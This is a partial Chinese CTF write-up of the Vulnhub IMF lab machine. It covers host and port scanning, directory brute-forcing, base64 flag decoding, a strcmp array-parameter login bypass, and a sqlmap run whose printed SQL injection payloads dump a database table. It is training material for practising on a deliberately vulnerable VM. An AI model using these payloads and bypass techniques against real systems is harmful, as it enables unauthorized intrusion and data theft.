Vulnhub之IMF靶机测试过程(部分)
IMF
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:cc:e7:6e 1 60 PCS Systemtechnik GmbH
192.168.56.148 08:00:27:99:c0:35 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.148
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.148 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-03 01:38 EST
Nmap scan report for localhost (192.168.56.148)
Host is up (0.0011s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF - Homepage
MAC Address: 08:00:27:99:C0:35 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.27 seconds
NMAP扫描结果表明目标主机有1个开放端口:80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ curl http://192.168.56.148/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.148 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ nikto -h http://192.168.56.148
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.148
+ Target Hostname: 192.168.56.148
+ Target Port: 80
+ Start Time: 2023-01-03 01:46:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-01-03 01:47:27 (GMT-5) (61 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ gobuster dir -u http://192.168.56.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.148
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/03 01:48:40 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.148/images/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.148/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.148/js/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.148/fonts/]
/less (Status: 301) [Size: 315] [--> http://192.168.56.148/less/]
/server-status (Status: 403) [Size: 302]
Progress: 218473 / 220561 (99.05%)
===============================================================
2023/01/03 01:49:29 Finished
===============================================================
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ gobuster dir -u http://192.168.56.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.148
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Extensions: php,html,txt,sh,js
[+] Timeout: 10s
===============================================================
2023/01/03 01:49:46 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 294]
/images (Status: 301) [Size: 317] [--> http://192.168.56.148/images/]
/.php (Status: 403) [Size: 293]
/index.php (Status: 200) [Size: 4797]
/contact.php (Status: 200) [Size: 8649]
/projects.php (Status: 200) [Size: 6574]
/css (Status: 301) [Size: 314] [--> http://192.168.56.148/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.148/js/]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.148/fonts/]
/less (Status: 301) [Size: 315] [--> http://192.168.56.148/less/]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
Progress: 1322225 / 1323366 (99.91%)
===============================================================
2023/01/03 01:55:18 Finished
===============================================================
在contact.php页面源代码中有注释:
<section id="service">
<div class="container">
<!-- flag1{YWxsdGhlZmlsZXM=} -->
<div class="service-wrapper">
<div class="row">
将其解码:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ echo 'YWxsdGhlZmlsZXM=' | base64 -d
allthefiles
<!-- Js -->
<script src="js/vendor/modernizr-2.6.2.min.js"></script>
<script src="js/vendor/jquery-1.10.2.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/ZmxhZzJ7YVcxbVl.js"></script>
<script src="js/XUnRhVzVwYzNS.js"></script>
<script src="js/eVlYUnZjZz09fQ==.min.js"></script>
<script>
new WOW(
).init();
</script>
注意这里的js文件名比较奇怪,将其组合在一起,然后解码:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ echo 'ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==' | base64 -d
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ echo 'aW1mYWRtaW5pc3RyYXRvcg==' |base 64 -d
Command 'base' not found, did you mean:
command 'basez' from deb basez
command 'ase' from deb ase
command 'bash' from deb bash
command 'basex' from deb basex
Try: sudo apt install <deb name>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ echo 'aW1mYWRtaW5pc3RyYXRvcg==' |base64 -d
imfadministrator
imfadministrator这应该是新的目录名,访问该目录,返回用户登录窗口:
页面源代码为:
Invalid username.<form method="POST" action="">
<label>Username:</label><input type="text" name="user" value=""><br />
<label>Password:</label><input type="password" name="pass" value=""><br />
<input type="submit" value="Login">
<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->
</form>
因此不存在SQL注入漏洞,是否可以用hydra破解其密码,用户名为roger,
手动测试一下登录,发现roger,返回invalide username, 因此用户名不正确。
在contact页面有3个邮箱:
rmichaels@imf.local,akeith@imf.local,estone@imf.local
分别用rmichaels, akeith以及estone
发现当用rmichaels登录时,返回invalid password
通过注释得知密码是直接写在php文件里的。
猜测是使用strcmp之类的来判断密码的。当strcmp的两个字符串参数相等的时候会返回0,但如果把string和array相比较的话,strcmp也会返回0。
所以将源码里的<input name="pass" value="" type="password">
修改成<input name="pass[]" value="" type="password">
使pass参数变成array。
成功登录后,返回:
flag3{Y29udGludWVUT2Ntcw==}
Welcome, rmichaels
进入cms后浏览网页,发现URL里面pagename参数存在注入点,复制cookie信息然后使用sqlmap测试:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ sqlmap -u http://192.168.56.148/imfadministrator/cms.php?pagename=upload --cookie='PHPSESSID=uhlmpr7dj8g85k0hdhd1dqqpo2' --dump
___
__H__
___ ___["]_____ ___ ___ {1.6.7#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 03:04:22 /2023-01-03/
[03:04:24] [INFO] testing connection to the target URL
[03:04:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[03:04:24] [INFO] testing if the target URL content is stable
[03:04:24] [INFO] target URL content is stable
[03:04:24] [INFO] testing if GET parameter 'pagename' is dynamic
[03:04:24] [INFO] GET parameter 'pagename' appears to be dynamic
[03:04:24] [INFO] heuristic (basic) test shows that GET parameter 'pagename' might be injectable (possible DBMS: 'MySQL')
[03:04:24] [INFO] testing for SQL injection on GET parameter 'pagename'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[03:04:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:04:30] [INFO] GET parameter 'pagename' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Under")
[03:04:30] [INFO] testing 'Generic inline queries'
[03:04:30] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[03:04:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[03:04:30] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[03:04:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[03:04:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[03:04:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[03:04:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[03:04:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[03:04:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[03:04:30] [INFO] GET parameter 'pagename' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[03:04:30] [INFO] testing 'MySQL inline queries'
[03:04:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[03:04:30] [WARNING] time-based comparison requires larger statistical model, please wait........... (done)
[03:04:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[03:04:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[03:04:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[03:04:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[03:04:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[03:04:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[03:04:40] [INFO] GET parameter 'pagename' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[03:04:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:04:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:04:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[03:04:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[03:04:40] [INFO] target URL appears to have 1 column in query
[03:04:40] [INFO] GET parameter 'pagename' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'pagename' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: pagename (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pagename=upload' AND 8675=8675 AND 'uIWb'='uIWb
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: pagename=upload' AND (SELECT 2178 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(2178=2178,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QMmN'='QMmN
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: pagename=upload' AND (SELECT 5062 FROM (SELECT(SLEEP(5)))uNLZ) AND 'hBuo'='hBuo
Type: UNION query
Title: MySQL UNION query (NULL) - 1 column
Payload: pagename=-1167' UNION ALL SELECT CONCAT(0x717a717671,0x6e59584253694e6f465a6176756e42666d51434f6d655079616951736c6e616476476e7a72424c48,0x71786a7671)#
---
[03:04:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[03:04:48] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[03:04:48] [INFO] fetching current database
[03:04:48] [INFO] fetching tables for database: 'admin'
[03:04:48] [INFO] fetching columns for table 'pages' in database 'admin'
[03:04:48] [INFO] retrieved: 'id','int(11)'
[03:04:48] [INFO] retrieved: 'pagename','varchar(255)'
[03:04:48] [INFO] retrieved: 'pagedata','text'
[03:04:48] [INFO] fetching entries for table 'pages' in database 'admin'
[03:04:48] [INFO] retrieved: '1','Under Construction.','upload'
[03:04:48] [INFO] retrieved: '2','Welcome to the IMF Administration.','home'
[03:04:48] [INFO] retrieved: '3','Training classrooms available. <br /><img src="./images/whiteboard.jpg"><br /> Contact us...
[03:04:48] [INFO] retrieved: '4','<h1>Disavowed List</h1><img src="./images/redacted.jpg"><br /><ul><li>*********</li><li>*...
Database: admin
Table: pages
[4 entries]
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
| id | pagedata | pagename |
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
| 1 | Under Construction. | upload |
| 2 | Welcome to the IMF Administration. | home |
| 3 | Training classrooms available. <br /><img src="./images/whiteboard.jpg"><br /> Contact us for training. | tutorials-incomplete |
| 4 | <h1>Disavowed List</h1><img src="./images/redacted.jpg"><br /><ul><li>*********</li><li>****** ******</li><li>*******</li><li>**** ********</li></ul><br />-Secretary | disavowlist |
+----+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------------------+
[03:04:49] [INFO] table 'admin.pages' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.56.148/dump/admin/pages.csv'
[03:04:49] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.148'
[*] ending @ 03:04:49 /2023-01-03/
http://192.168.56.148/imfadministrator/images/whiteboard.jpg
访问该图片,为二维码,扫描该码得到第4个flag
flag4{dXBsb2Fkcjk0Mi5waHA=}
对其进行解码:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/IMF]
└─$ echo 'dXBsb2Fkcjk0Mi5waHA=' | base64 -d
uploadr942.php